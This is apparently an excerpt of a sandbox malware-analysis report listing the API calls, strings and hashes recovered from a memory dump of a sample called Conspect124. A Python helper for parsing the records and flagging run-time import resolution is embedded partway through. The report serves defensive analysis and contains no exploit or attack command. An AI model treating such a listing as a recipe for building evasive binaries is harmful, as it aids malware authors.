                                      • GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 00412403
                                      • RegisterClassW.USER32(00000001), ref: 00412428
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                      • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000,?), ref: 00412455
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: HandleModule$ClassCreateRegisterWindow
                                      • String ID:
                                      • API String ID: 2678498856-0
                                      • Opcode ID: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                      • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                      • Opcode Fuzzy Hash: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                      • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                      APIs
                                      • GetDlgItem.USER32(?,?), ref: 00409B40
                                      • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                      • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                      • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: MessageSend$Item
                                      • String ID:
                                      • API String ID: 3888421826-0
                                      • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                      • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                      • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                      • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                      APIs
                                      • memset.MSVCRT ref: 00417B7B
                                      • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                      • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                      • GetLastError.KERNEL32 ref: 00417BB5
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: File$ErrorLastLockUnlockmemset
                                      • String ID:
                                      • API String ID: 3727323765-0
                                      • Opcode ID: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                      • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                      • Opcode Fuzzy Hash: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                      • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                      APIs
                                      • memset.MSVCRT ref: 0040F673
                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00007FFF,00000000,00000000,00000000), ref: 0040F690
                                      • strlen.MSVCRT ref: 0040F6A2
                                      • WriteFile.KERNEL32(00000001,?,00000000,00000000,00000000), ref: 0040F6B3
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                      • String ID:
                                      • API String ID: 2754987064-0
                                      • Opcode ID: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                      • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                      • Opcode Fuzzy Hash: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                      • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                      APIs
                                      • memset.MSVCRT ref: 0040F6E2
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,000000FF,?,00001FFF,00000000,00000000,00000001,0044E5FC,00000000,00000000,00000000,?,00000000,00000000), ref: 0040F6FB
                                      • strlen.MSVCRT ref: 0040F70D
                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040F71E
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                      • String ID:
                                      • API String ID: 2754987064-0
                                      • Opcode ID: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                      • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                      • Opcode Fuzzy Hash: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                      • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                      APIs
                                        • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                        • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                        • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                      • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                      • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                      • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                      • GetStockObject.GDI32(00000000), ref: 004143C6
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                      • String ID:
                                      • API String ID: 764393265-0
                                      • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                      • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                      • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                      • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                      APIs
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                      • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                      • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Time$System$File$LocalSpecific
                                      • String ID:
                                      • API String ID: 979780441-0
                                      • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                      • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                      • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                      • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                      APIs
                                      • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                      • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                      • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memcpy$DialogHandleModuleParam
                                      • String ID:
                                      • API String ID: 1386444988-0
                                      • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                      • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                      • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                      • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                      APIs
                                      • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                      • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: InvalidateMessageRectSend
                                      • String ID: d=E
                                      • API String ID: 909852535-3703654223
                                      • Opcode ID: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                      • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                      • Opcode Fuzzy Hash: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                      • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                      APIs
                                      • wcschr.MSVCRT ref: 0040F79E
                                      • wcschr.MSVCRT ref: 0040F7AC
                                        • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                        • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4), ref: 0040AACB
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: wcschr$memcpywcslen
                                      • String ID: "
                                      • API String ID: 1983396471-123907689
                                      • Opcode ID: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                      • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                      • Opcode Fuzzy Hash: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                      • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                      APIs
                                      • _snwprintf.MSVCRT ref: 0040A398
                                      • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: _snwprintfmemcpy
                                      • String ID: %2.2X
                                      • API String ID: 2789212964-323797159
                                      • Opcode ID: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                      • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                      • Opcode Fuzzy Hash: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                      • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: _snwprintf
                                      • String ID: %%-%d.%ds
                                      • API String ID: 3988819677-2008345750
                                      • Opcode ID: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                      • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                      • Opcode Fuzzy Hash: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                      • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                      APIs
                                      • GetWindowPlacement.USER32(?,?,?,?,?,00411B7F,?,General,?,00000000,00000001), ref: 00401904
                                      • memset.MSVCRT ref: 00401917
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: PlacementWindowmemset
                                      • String ID: WinPos
                                      • API String ID: 4036792311-2823255486
                                      • Opcode ID: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                      • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                      • Opcode Fuzzy Hash: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                      • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                      APIs
                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                      • wcsrchr.MSVCRT ref: 0040DCE9
                                      • wcscat.MSVCRT ref: 0040DCFF
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: FileModuleNamewcscatwcsrchr
                                      • String ID: _lng.ini
                                      • API String ID: 383090722-1948609170
                                      • Opcode ID: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                      • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                      • Opcode Fuzzy Hash: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                      • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                      APIs
                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                      • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                      • String ID: SHGetSpecialFolderPathW$shell32.dll
                                      • API String ID: 2773794195-880857682
                                      • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                      • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                      • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                      • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
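The record above is the one place in this stretch of the report where the sample resolves an import at run time: LoadLibraryW on a path built from GetSystemDirectoryW plus shell32.dll, then GetProcAddress("SHGetSpecialFolderPathW"), so the name never appears in the PE import table. Reading hundreds of these IDA-plugin records by hand is slow, so the following added example (not part of the Joe Sandbox report and not a Joe Sandbox API) parses the record layout used on this page into structured data and flags records that pair LoadLibrary* with GetProcAddress, listing the names that were resolved. The SAMPLE text is two records copied from this page with indentation trimmed; the regular expressions assume exactly this layout (bullet lines of the form `Name.MODULE(args), ref: address`, a `Part of subcall function` prefix for callees, and `$`-joined String IDs), which is an assumption about the page format rather than a documented one.

```python
"""Added triage helper: parse Joe Sandbox IDA-plugin function records.
The layout is inferred from this report; the regexes are an assumption, not a Joe Sandbox API."""
from __future__ import annotations

import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: two records copied from the report above (indentation trimmed).
SAMPLE = r"""
APIs
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
• GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
Similarity
• API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
• String ID: SHGetSpecialFolderPathW$shell32.dll
• API String ID: 2773794195-880857682
• Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
APIs
• FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
Similarity
• API ID: Time$System$File$LocalSpecific
• String ID:
• API String ID: 979780441-0
"""


@dataclass
class ApiCall:
    name: str                          # e.g. GetProcAddress
    module: str                        # e.g. KERNEL32
    args: list[str]                    # recovered arguments; '?' means the sandbox could not resolve one
    ref: int                           # call-site address in the dump
    subcall_of: Optional[int] = None   # set for 'Part of subcall function XXXXXXXX:' lines


@dataclass
class FunctionRecord:
    apis: list[ApiCall] = field(default_factory=list)
    api_id: str = ""
    string_id: str = ""
    api_string_id: str = ""
    opcode_id: str = ""

    @property
    def api_names(self) -> set[str]:
        return {c.name for c in self.apis}

    @property
    def strings(self) -> list[str]:
        # the report joins referenced strings with '$'; an empty String ID yields no strings
        return [s for s in self.string_id.split("$") if s]

    @property
    def first_ref(self) -> Optional[int]:
        # lowest call site of a direct (non-subcall) call: where to start reading in the dump
        direct = [c.ref for c in self.apis if c.subcall_of is None]
        return min(direct) if direct else None


API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>API ID|String ID|API String ID|Opcode ID):\s*(?P<val>.*?)\s*$")


def parse_records(text: str) -> list[FunctionRecord]:
    records: list[FunctionRecord] = []
    cur: Optional[FunctionRecord] = None
    for line in text.splitlines():
        if line.strip() == "APIs":          # every record opens with its APIs block
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] is not None else []
            cur.apis.append(ApiCall(m["name"], m["mod"], args, int(m["ref"], 16),
                                    int(m["sub"], 16) if m["sub"] else None))
            continue
        f = FIELD_RE.match(line)
        if f:   # 'API String ID' -> api_string_id, etc.
            setattr(cur, f["key"].lower().replace(" ", "_"), f["val"])
    return records


LOADERS = {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW"}


def uses_dynamic_api_resolution(rec: FunctionRecord) -> bool:
    """LoadLibrary* and GetProcAddress in the same record (subcalls included)."""
    return bool(rec.api_names & LOADERS) and "GetProcAddress" in rec.api_names


def runtime_resolved_imports(rec: FunctionRecord) -> list[str]:
    """Literal names passed to GetProcAddress: imports that never appear in the PE import table."""
    return [c.args[1] for c in rec.apis
            if c.name == "GetProcAddress" and len(c.args) >= 2 and c.args[1] not in ("?", "00000000")]


if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        if uses_dynamic_api_resolution(rec):
            print(f"{rec.first_ref:08X} resolves {runtime_resolved_imports(rec)} via {rec.strings}")
```

Run against the whole function listing, the flagged records give a quick inventory of what the unpacked payload resolves by name; names that show up only as `?` or `00000000` were not recovered by the sandbox and have to be read from the dump at `first_ref` instead.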
                                      APIs
                                      • GetWindowLongW.USER32(?,000000EC), ref: 0040A159
                                      • SetWindowLongW.USER32(000000EC,000000EC,00000000), ref: 0040A16B
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: LongWindow
                                      • String ID: MZ@
                                      • API String ID: 1378638983-2978689999
                                      • Opcode ID: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                      • Instruction ID: 658df1d6f65a5f4ca5cf2dc917bfbc57e2b12ac14a328fb0c2cac09aa770bd9f
                                      • Opcode Fuzzy Hash: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                      • Instruction Fuzzy Hash: 3FC0027415D116AFDF112B35EC0AE2A7EA9BB86362F208BB4B076E01F1CB7184109A09
                                      APIs
                                      • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                      • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                      • memset.MSVCRT ref: 0042BAAE
                                      • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memcpy$memset
                                      • String ID:
                                      • API String ID: 438689982-0
                                      • Opcode ID: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                      • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                      • Opcode Fuzzy Hash: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                      • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                      APIs
                                        • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                      • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                      • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                      • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                      Memory Dump Source
